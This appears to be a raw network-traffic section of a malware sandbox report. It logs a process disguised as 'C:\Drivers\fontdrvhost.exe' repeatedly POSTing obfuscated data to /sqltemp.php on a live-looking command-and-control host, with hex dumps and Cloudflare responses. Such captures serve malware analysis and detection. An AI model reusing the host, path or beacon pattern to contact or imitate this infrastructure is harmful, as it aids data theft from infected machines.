                                                                                                                                                                                            Jan 1, 2025 14:52:12.110141993 CET2472OUTData Raw: 20 17 3c 5d 01 03 01 21 20 04 2e 1a 02 06 20 2c 2b 12 35 3b 35 39 00 54 3a 34 51 1d 3d 59 09 1c 3f 5a 0f 22 33 2e 14 5a 34 33 25 5e 30 01 38 25 37 36 39 14 3c 3c 0d 3e 07 3a 24 12 05 3f 5c 05 3c 54 0d 12 33 38 2a 19 31 2c 34 56 07 2c 5f 15 39 02
                                                                                                                                                                                            Data Ascii: <]! . ,+5;59T:4Q=Y?Z"3.Z43%^08%769<<>:$?\<T38*1,4V,_9==?7%&1^<?79X=>#[(1>40<^P1U+710&><19:8ZS->50*;X=^1+\[8.(_"[/ =8\'5./YU?77+499'.7&/!?04..],:? -19&I]>RX5:.95P%!(".0=Y>\#<(
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110213995 CET2472OUTData Raw: 3b 3d 19 26 3c 39 33 53 3b 2c 1e 3c 38 31 19 2e 32 29 15 06 0b 5b 28 5d 32 3d 14 0f 3a 21 3c 15 34 5a 5a 2b 3d 30 38 5f 09 3b 3f 30 3a 31 1c 02 38 36 29 37 39 5a 1a 14 0f 5f 25 3d 0d 21 20 03 3f 57 31 1f 26 05 3a 1b 3a 2f 28 15 02 00 3e 0c 3a 2d
                                                                                                                                                                                            Data Ascii: ;=&<93S;,<81.2)[(]2=:!<4ZZ+=08_;?0:186)79Z_%=! ?W1&::/(>:-5&6T1[$%(?\+.%S;+,10_2!/!?>32'Y8]'>(676> P^?9$5?-#W$<7)4>1?.^0()3$$"5$-_)/35W=?31'Y)$5_XS$5:!-.> 13>U:-W\
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110249996 CET2472OUTData Raw: 3b 3b 03 07 2b 27 1f 5e 07 56 55 21 39 05 06 06 29 2b 1f 35 0c 5b 06 0e 00 33 1c 32 2a 2e 3e 1d 39 20 37 1e 33 05 3b 15 31 06 3d 18 3f 00 25 35 0a 22 20 58 05 00 5e 59 3c 5a 55 3e 08 2b 30 5b 23 02 38 01 27 32 01 5f 39 30 0d 3c 36 3d 37 24 06 2c
                                                                                                                                                                                            Data Ascii: ;;+'^VU!9)+5[32*.>9 73;1=?%5" X^Y<ZU>+0[#8'2_90<6=7$,V^1[PX?.9\<9;,?=?5*38063/""<..4<>Q$W? V&%42<>10UZ]Y:8[<455&#2D35?98*,',&?$4^SY?X+])8P8?<2,-^-;<C,2:/;6* 20!^
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110289097 CET2472OUTData Raw: 30 06 0f 42 28 1d 35 24 27 5d 44 38 07 06 33 3c 21 3d 5c 07 02 3a 2b 5a 3c 2d 13 27 30 03 0b 05 0e 31 33 10 0d 01 28 07 09 00 13 24 3c 01 35 12 0c 01 3a 26 24 2e 3c 44 2c 26 2e 0e 3f 05 24 58 2e 17 11 53 03 00 09 00 3c 0c 2b 10 36 37 3a 18 32 06
                                                                                                                                                                                            Data Ascii: 0B(5$']D83<!=\:+Z<-'013($<5:&$.<D,&.?$X.S<+67:2W99:;:,V)2T-X5;:(11Y&61'U;**S/>/=]"<?Z ,3)?Z'Y="4X@#.7217\#Z>?)T ?9??) !+]95&,(/?(?'P[!>=7??^<20:C!)>?#*-T05
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110301018 CET2472OUTData Raw: 29 59 3b 14 3a 12 5d 2d 3e 2e 06 5f 36 5d 30 54 3b 03 2f 5f 0d 58 3b 2e 30 39 20 15 3f 05 34 1c 32 00 32 1d 3f 3e 2c 18 2b 03 03 2d 27 31 33 06 3f 0e 11 04 22 55 18 05 3f 0a 21 56 38 59 0e 15 3f 5f 0c 1b 0c 0c 02 2c 08 0d 2a 19 3d 05 26 1d 0b 3a
                                                                                                                                                                                            Data Ascii: )Y;:]->._6]0T;/_X;.09 ?422?>,+-'13?"U?!V8Y?_,*=&:(8X%5^!$]+[++XB5?-;3%*'2;.WSX1_%Y&7>YZ;B:*5.?2:FT=>#!46^. Y?2="^<1*C)7 Z$>).,77>V?0$>?^_'<"($."<)X4>8
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110378981 CET4944OUTData Raw: 0f 11 24 10 2d 5b 0b 03 08 5d 17 03 3f 39 35 20 01 21 17 59 21 5a 1e 27 32 29 5a 5c 3a 07 5b 2c 31 32 36 29 03 00 13 26 0a 54 51 59 37 03 38 2a 3b 2d 5e 3d 32 07 0b 3e 27 3c 3c 59 32 5f 2c 30 0e 2e 0f 59 0f 01 3f 21 0f 2e 24 2c 39 09 12 59 34 3d
                                                                                                                                                                                            Data Ascii: $-[]?95 !Y!Z'2)Z\:[,126)&TQY78*;-^=2>'<<Y2_,0.Y?!.$,9Y4=?@,T31P[/6*0#$8>+)9.?-_9X"5'<7 (."!TP8 &.?W$-<5!8Z2"01;&(:0.,12?=%/V1<(^^1&5$;0"Y55"V0Z>Y-*X?2*=U=1"7%
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110416889 CET2472OUTData Raw: 03 08 3f 19 38 58 30 5b 03 2e 0a 1a 39 33 32 13 27 58 1d 1b 04 2b 11 13 3b 28 1a 39 26 2e 28 13 29 5d 06 11 3a 59 20 20 35 3d 25 1d 26 3f 3f 31 01 59 08 1d 21 1f 19 5e 39 19 2f 19 35 0c 03 5b 39 38 21 2f 24 2f 5a 1b 0f 3a 13 18 0c 57 06 3a 20 1d
                                                                                                                                                                                            Data Ascii: ?8X0[.932'X+;(9&.()]:Y 5=%&??1Y!^9/5[98!/$/Z:W: X*=?'P;;>0^>#:#7 *?;:5="#W$8Y^'>2>/:&U??!+#UZ?>X+)1[Q:!Z)- *'*^,8>1-&'_3Q>#U2%>Y=3-<>>%.2
                                                                                                                                                                                            Jan 1, 2025 14:52:12.358217955 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:12.450468063 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.449746104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:11.873708963 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:12.230207920 CET1012OUTData Raw: 56 57 5f 54 51 5c 54 50 58 56 52 59 56 58 59 55 5b 5f 54 50 55 5b 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_TQ\TPXVRYVXYU[_TPU[PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?[4&'>@,4.<[*);S>44"+]>%,(:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:12.358345985 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.449750104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:12.798404932 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:13.151906013 CET1012OUTData Raw: 53 57 5a 54 51 5d 54 54 58 56 52 59 56 5a 59 54 5b 5b 54 5c 55 54 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZTQ]TTXVRYVZYT[[T\UTP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'%[#:';,) ;($)>,]!2+X+;.&,<9*&Y.,Y--


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.449754104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:13.298629999 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:13.678751945 CET1012OUTData Raw: 56 5f 5f 51 51 5a 51 50 58 56 52 59 56 58 59 50 5b 5c 54 51 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__QQZQPXVRYVXYP[\TQUXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-35\7,9]$=(89%V73+')= Z727?(>%?9&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:13.742327929 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.449755104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:13.800731897 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:14.152074099 CET1852OUTData Raw: 53 54 5f 50 54 5e 54 55 58 56 52 59 56 51 59 55 5b 5f 54 5b 55 5c 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_PT^TUXVRYVQYU[_T[U\PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$Y>#/X3X7B8:!.#(9((.(X "/]<:&-:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:14.243860006 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            11192.168.2.449758104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:14.266036987 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:14.626246929 CET1012OUTData Raw: 53 57 5a 54 54 59 54 5c 58 56 52 59 56 5f 59 51 5b 5b 54 51 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZTTYT\XVRYV_YQ[[TQUUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$*#-38894=(^<=Z7[*;91 -:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:52:14.722331047 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:14.988084078 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:14 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2XL3WyUNXT7zbUaeY4ID15UEC5wP%2BabqUXdZmhBg77ggpxMw4z3hB%2Bs9CgV29KlSFuZaqV%2BvFdnh1DyYM2s5TA0Rt89otTZyPvJ3LA8M3cciwEDPH5pcBQr5J7oasAbqf8OMGU7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd1bb86943fe-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8449&min_rtt=2417&rtt_var=12971&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28810&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            12192.168.2.449759104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:15.113224030 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:15.464382887 CET1012OUTData Raw: 56 51 5f 5d 51 5d 54 51 58 56 52 59 56 5c 59 51 5b 52 54 5b 55 59 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_]Q]TQXVRYV\YQ[RT[UYPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'/-]#,.$#B.).7(*9'*>$!2<;5D%<#V.&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:15.552138090 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:15.820786953 CET811INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:15 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8qHZq%2BLW6DNhPLCb7Lrw%2B7A1xr51lUCaiX8EGkR4zp9TSV0%2BEKMugipV%2BUappoogGZ7nAPbwMdmIjzUFZdJscBx6wekF3TpNOR%2FCiOjS2zQ6RzrtLB%2FxQSDRvyzckeVJVFaNY8c"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd20eaecc47c-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=1506&rtt_var=1609&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=256906&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            13192.168.2.449760104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:15.949764967 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:16.308116913 CET1012OUTData Raw: 53 50 5f 5d 54 50 51 57 58 56 52 59 56 5a 59 56 5b 5f 54 5a 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_]TPQWXVRYVZYV[_TZUTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3<5Z7,=Y%.?E,)7((7*>4Z!2++)C27S.*&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:16.413692951 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:16.668965101 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:16 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8LTAy1Auw5EhmSb2Gl%2Bv9R0UmUujL0Aqf%2Fwut6I1Jm8UcturesJETk8ktfe%2F66a1xOPEzEJEtyIzj0cu7l70yTmjSoABwF2QIHZvJsjkwrD50j0B%2FbA53ebprfbT5ozimZYy9Hp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd264c527c78-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3789&min_rtt=1924&rtt_var=4452&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=86667&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            14192.168.2.449761104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:16.792577028 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:17.152208090 CET1012OUTData Raw: 53 57 5f 56 54 50 54 54 58 56 52 59 56 5e 59 54 5b 5b 54 59 55 5c 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_VTPTTXVRYV^YT[[TYU\P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^0Y:#-\$?;)=4=3?98*=+ /\+$/'R,:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:17.235599995 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:17.486134052 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:17 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UbYR9Yl%2BjQY5b3tDaJdTKmQC1LPkhnGF9VyEeDhZ2XmTSVCPzRPGYF4njzDr%2FjNnde6bycgcDf66E1IrYyjdO7QHUcRDUaoCUsOmO5cG36cf498ni2pmJ8vODFgLtxVIsPF1IXFy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd2b7a6bde93-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2501&min_rtt=1441&rtt_var=2661&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=147118&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            15192.168.2.449762104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:17.613313913 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:17.964365005 CET1012OUTData Raw: 56 54 5a 56 54 50 51 50 58 56 52 59 56 5c 59 54 5b 5e 54 5b 55 54 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VTZVTPQPXVRYV\YT[^T[UTPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.05\ 3X781!-Y*9>,#1/X?B%<$-&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:18.058342934 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:18.313347101 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:18 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YmZiKW6%2FSvQbdErUkDIdqf8OcfECdAUznFJ2sC7N6TRM0lC3g%2BBVrlWhVlNR3IM%2F6WXTYmNGf%2FWsVIKeFnzj67Wsgv6qNZtSp0EoBk1SNf5O6laX4PpAJuRtcuxxOaN5c0XbjQR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd309b744234-EWR
